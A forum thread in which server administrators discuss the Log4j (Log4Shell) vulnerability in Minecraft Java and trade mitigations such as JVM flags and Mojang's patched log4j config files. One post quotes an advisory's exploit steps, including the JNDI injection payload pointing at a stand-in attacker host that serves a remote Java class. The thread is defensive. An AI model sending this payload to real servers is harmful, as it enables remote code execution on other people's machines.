Minecraft Java critical vulnerability

[qspider]

I just saw some news about a JAVA critical security threat found in Minecraft. They are saying to restart the launcher and it will fix the issue. Does anyone know if anything needs to be done on the server side? 

Seems more client related. 

[qspider]

Adding -Dlog4j2.formatMsgNoLookups=true to the commandline may fix the issue for versions 1.12+. 

[qspider]

Also adding a white list. It appears public servers are high risk for this vulnerabilty. 

[eyup51]

Many forks have updated (For versions 1.8 and higher) on this. If you are using forks like spigot, paper, you should update. 

Server users should consider what I mentioned above.

 

Edited December 10, 2021 by eyup51

[Dennis]

Please note: The TCAdminCrons plugin (https://community.tcadmin.com/files/file/59-tcadmincrons/) uses ServerJars to get updates. ServerJars has not compiled patched versions yet, and I'm not sure they are going to (at least for old versions).

If you provide patched versions, you will need to remove all affected versions from TCAdmin and run the TCAdminCrons plugin again. The plugin will not overwrite existing updates in TCAdmin.

 

Also, as far as I understand, this is not a security issue for your servers. It affects clients, not servers.
If I'm wrong, please tell me.

[qspider]

10 hours ago, Dennis said:

Also, as far as I understand, this is not a security issue for your servers. It affects clients, not servers.
If I'm wrong, please tell me.

The way I'm reading this it affects all Minecraft servers using Java 8 and above. User injects code through console and it gets logged. Exploit process begins. I could be wrong though. 

https://www.lunasec.io/docs/blog/log4j-zero-day/
Exploit Steps

1. Data from the User gets sent to the server (via any protocol),
2. The server logs the data in the request, containing the malicious payload: ${jndi:ldap://attacker.com/a} (where attacker.com is an attacker controlled server),
3. The log4j vulnerability is triggered by this payload and the server makes a request to attacker.com via "Java Naming and Directory Interface" (JNDI),
4. This response contains a path to a remote Java class file (ex. http://second-stage.attacker.com/Exploit.class) which is injected into the server process,
5. This injected payload triggers a second stage, and allows an attacker to execute arbitrary code.

Exploit Requirements

• A server with a vulnerable log4j version (listed above),
• an endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send the exploit string,
• and a log statement that logs out the string from that request.

[Spillvert.no]

On 12/10/2021 at 11:38 AM, Dennis said:

Also, as far as I understand, this is not a security issue for your servers. It affects clients, not servers.

If I'm wrong, please tell me.

Mojang is indeed urging Java server owners to take steps:

https://www.minecraft.net/nb-no/article/important-message--security-vulnerability-java-edition

[Adam]

Quote

Summary of the instructions:
- If possible please update to 1.18.1, if you're not able to do so, please follow the same approach as Minecraft 1.17.X
- Minecraft 1.17.X
Add the following JVM arguments to your startup command line -Dlog4j2.formatMsgNoLookups=true
- 1.12-1.16.5
Download this file (https://launcher.mojang.com/v1/objects/02937d122c86ce73319ef9975b58896fc1b491d1/log4j2_112-116.xml) to the working directory where your server runs. Then add the following JVM arguments to your startup command line: 
-Dlog4j.configurationFile=log4j2_112-116.xml
- 1.7-1.11.2
Download this file (https://launcher.mojang.com/v1/objects/dd2b723346a8dcd48e7f4d245f6bf09e98db9696/log4j2_17-111.xml) to the working directory where your server runs. Then add the following JVM arguments to your  startup command line: 
-Dlog4j.configurationFile=log4j2_17-111.xml
Versions below 1.7 are not affected

You guys can make different commandlines with the different flags.

Edited December 13, 2021 by SHAD0WRAIDERZA

[Spillvert.no]

Absolutely this can be fixed for the pre-built packs and versions you provide in TCA.

However, in real life it is not that easy to enforce this fix when users are able to upload and run any version of MC and older pre-built modpacks. And the Updates does not allow for custom commandlines so it needs to be scripted for every update.

The panel needs to know what version the server is on and apply the correct startup variable. If the wrong command is used (ex: -Dlog4j2.formatMsgNoLookups=true on a 1.16 server) it will fail to start.

[Dennis]

The config I've built for Minecraft can already somewhat automatically detect the version of Minecraft being started. I'll see if I can get these things implemented so TCAdmin secures the server before startup.

[Dennis]

I might've spoken too soon.

We detect the version of Java required based on the headeres in the .class files. There doesn't seem to be an easy way of knowing what version of Minecraft a specific jar file is. I can find it by manually searching the class files, but automating this process is almost impossible.